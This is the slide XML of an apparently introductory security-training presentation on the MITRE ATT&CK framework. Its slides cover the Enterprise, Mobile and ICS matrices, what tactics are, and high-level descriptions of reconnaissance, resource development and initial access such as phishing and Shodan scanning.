            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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defenses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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(ATLAS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="20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🔒 Rules of Engagement</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Strict scope: No chaos, just clues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="20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🎯 Why It Matters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Find flaws before criminals do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="20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💪 Security Posture</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Turn weaknesses into moats &amp; drawbridges.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DA5B4A0-1148-18DA-9EA9-1A819D7C681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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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4346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44C726-F8CF-EA71-620E-A81D22ABF3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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2920DABB-F3A9-647F-E35C-069E29F1AA7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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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4CD26CD7-5CE0-B3B2-3B55-C692D5FAC5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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Matrices</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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5AAD0833-94AC-0798-D1C7-6A5C619FCB0D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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984021" y="6164867"/>
            <a:ext cx="1761829" cy="728134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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768A942C-5189-9920-E178-4A9403E4A2A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776621" y="2227905"/>
            <a:ext cx="4495020" cy="4055533"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000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202AA69D-AEAC-DAE8-5A74-BB49FC35C1FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6199132" y="2227905"/>
            <a:ext cx="2116666" cy="4055533"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha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6D9CC806-0064-AF4C-3592-6A3392163821}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9243289" y="2227905"/>
            <a:ext cx="2116666" cy="4055533"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha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A0DABEC-7F00-5EA1-FEE7-4743BF91351C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2393364" y="1844489"/>
            <a:ext cx="12615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</a:rPr>
              <a:t>Enterprise</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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CFC79F7-09F7-52FD-A591-F42709775365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6626698" y="1844489"/>
            <a:ext cx="12615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</a:rPr>
              <a:t>Mobile</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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60086A3-3257-A753-F583-8B085227E6A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9670855" y="1844489"/>
            <a:ext cx="12615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</a:rPr>
              <a:t>ICS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="A logo of a microsoft windows&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B32621-DACD-C0F9-58D5-A2A129C3EF2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4467" y="2480734"/>
            <a:ext cx="812800" cy="812800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="A cartoon penguin with yellow feet&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8A5D3E-E1BA-1738-003D-5E3282E1D26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667" y="3564467"/>
            <a:ext cx="1032934" cy="1032934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="A black and white apple logo&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D65150F2-C639-575C-3B7B-03932C08A28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329" y="4868334"/>
            <a:ext cx="948272" cy="948272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A blue triangle with black background&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81A085D8-A9F7-1F96-C493-429B4CC4C94F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6175" y="2374521"/>
            <a:ext cx="995211" cy="995211"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="An orange square with a black door&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF5CB7DA-837C-C736-9777-96B9995B4A57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6529" y="3616436"/>
            <a:ext cx="952894" cy="952894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="A colorful letter g&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC2444D-C0BA-7174-8FB5-A1D865AEA6BD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8721" y="5010974"/>
            <a:ext cx="830820" cy="830820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="A cloud and globe with computer screens&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF320A95-5269-10C4-E1DD-2690D1CDFC11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0592" y="2450718"/>
            <a:ext cx="842816" cy="842816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="A black background with a black square&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA2CB0D-24CA-C550-188B-D510C0ED7B1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4322" y="3713895"/>
            <a:ext cx="860178" cy="860178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="A green robot with two horns&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16DEEDC1-18F1-FA44-2CC1-EEA9759151B1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3471" y="2779540"/>
            <a:ext cx="1027988" cy="1027988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="A black background with a black square&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0124CEBE-698F-097D-66FB-E3764B7085DE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9502" y="4359163"/>
            <a:ext cx="1055926" cy="1055926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28" descr="A factory with smokestack&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E6C3B5-1D0B-29A7-7A1B-B2AE4A932170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87454" y="2633636"/>
            <a:ext cx="1028336" cy="1028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7195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04090C2-FFDE-BB8B-8179-5B5A89F765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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563FEA01-B46A-F741-0C23-7051A3E02BA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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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72DA3392-806C-0AF5-A5B1-C015D2FB10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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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ATT&amp;CK Tactics</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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579B2BE-A3BF-DF8F-F93F-13C7B4CAEDC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="32762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Inter"/>
              </a:rPr>
              <a:t>What Are Tactics? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>- Explain the “why” behind an attack—high-level objectives and motivations.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>- They form the top layer of the framework, above techniques and sub-techniques.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Attackers’ Roadmap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>- Represent the overarching strategy that guides adversary actions.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>- In the Enterprise matrix, there are 14 tactics that outline a typical kill chain.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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F22223E-1F66-034A-18FD-5D3932A2A0D2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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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93348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A6DC3DA-2A63-81FA-6713-6061CDB0D0A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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87CEBDB1-5A9A-D735-5066-B65B6CA325F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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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EEADEB86-48F2-E1DD-93C0-E8B757639A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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Reconnaissance – Surveying the Scene</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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4798E22-24B0-3D82-FA2C-CA2BFFC650B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Attackers gather information about the target.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>They perform activities like network scanning and OSINT.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Using tools such as Shodan to identify exposed servers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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CFD06F1-D56F-E16E-A060-4B9897120675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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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79545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EA84750-8432-0CD6-C4DB-0FDFAC4B63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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EE06995-6EA5-FBE7-A0D7-8D23E5F322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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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EC8DC6C5-DD23-DBEB-104B-B63C65A389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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Resource Development: Building the Arsenal</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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87C6961-5C43-1ABF-B167-9B9C3E0D2888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>Preparation phase where attackers set up necessary tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Actions include registering fake domains and crafting phishing emails.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Creating a counterfeit login page to lure users.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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355BA04-C6FC-CA1D-3DFC-7326DB921C9E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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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8397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E9F099-5512-8C61-1E70-52667CC59C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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC2722F-2747-41D9-95F3-04B2BD93400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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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DEF94F44-2CC0-82ED-0EEF-4CE630672D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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Initial Access – Breaching the Defenses</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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6DFEA76-3BB2-A11C-1776-6F5A0C099C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="23529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Inter"/>
              </a:rPr>
              <a:t>The phase where attackers break into the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Common methods: phishing, exploiting vulnerabilities, brute-force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l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sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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Inter"/>
              </a:rPr>
              <a:t>Example: Sending spear-phishing emails to trick employees.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38CC720-AB7C-000E-3552-9C1D25AD4456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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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0242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D536CD-2EA6-4438-E310-9F2E26FB94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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06C4AE2-09D0-89BA-5B65-51463E725D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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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2637EF1F-E1C5-D031-F194-F36B1261BA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8" y="333906"/>
